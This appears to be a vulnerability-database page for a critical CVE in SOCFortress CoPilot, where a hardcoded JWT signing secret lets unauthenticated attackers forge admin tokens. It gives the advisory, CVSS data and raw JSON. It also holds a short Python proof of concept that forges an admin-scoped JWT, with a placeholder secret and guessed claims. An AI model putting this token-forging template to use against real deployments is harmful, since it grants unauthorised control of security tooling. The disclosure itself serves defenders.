Security Vulnerability Report
中文
CVE-2026-42869 CVSS 10.0 CRITICAL

CVE-2026-42869

Published: 2026-05-11 20:25:43
Last Modified: 2026-05-11 20:25:43
Source: [email protected]

Description

SOCFortress CoPilot focuses on providing a single pane of glass for all your security operations needs. Prior to 0.1.57, SOCFortress CoPilot ships a hardcoded JWT signing secret as a fallback value in backend/app/auth/utils.py:28 and ships it verbatim in .env.example. Any deployment where JWT_SECRET is not explicitly set — including the default Docker Compose setup — signs all authentication tokens with this publicly known value. An unauthenticated attacker can forge arbitrary admin-scoped JWTs and gain full control of the application and every security tool it manages without any credentials. This vulnerability is fixed in 0.1.57.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SOCFortress CoPilot < 0.1.57

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt import datetime def forge_admin_token(): # The hardcoded secret found in backend/app/auth/utils.py:28 # Replace 'YOUR_HARDcoded_SECRET_HERE' with the actual secret from the vulnerable source code HARDCODED_SECRET = 'YOUR_HARDcoded_SECRET_HERE' # Construct a payload with admin privileges # Adjust 'sub', 'role', or other fields based on the application's specific JWT requirements payload = { 'sub': 'admin', # Subject (User ID) 'role': 'admin', # Role 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=30) # Expiration } # Forge the token using the HS256 algorithm and the hardcoded secret forged_token = jwt.encode(payload, HARDCODED_SECRET, algorithm='HS256') print(f"Forged Admin JWT: {forged_token}") return forged_token if __name__ == "__main__": forge_admin_token()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42869", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:43.347", "lastModified": "2026-05-11T20:25:43.347", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOCFortress CoPilot focuses on providing a single pane of glass for all your security operations needs. Prior to 0.1.57, SOCFortress CoPilot ships a hardcoded JWT signing secret as a fallback value in backend/app/auth/utils.py:28 and ships it verbatim in .env.example. Any deployment where JWT_SECRET is not explicitly set — including the default Docker Compose setup — signs all authentication tokens with this publicly known value. An unauthenticated attacker can forge arbitrary admin-scoped JWTs and gain full control of the application and every security tool it manages without any credentials. This vulnerability is fixed in 0.1.57."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/socfortress/CoPilot/commit/4640511a0cf2e7b144a71375b5b349a8318cb186", "source": "[email protected]"}, {"url": "https://github.com/socfortress/CoPilot/pull/814", "source": "[email protected]"}, {"url": "https://github.com/socfortress/CoPilot/security/advisories/GHSA-4gxj-hw3c-3x2x", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.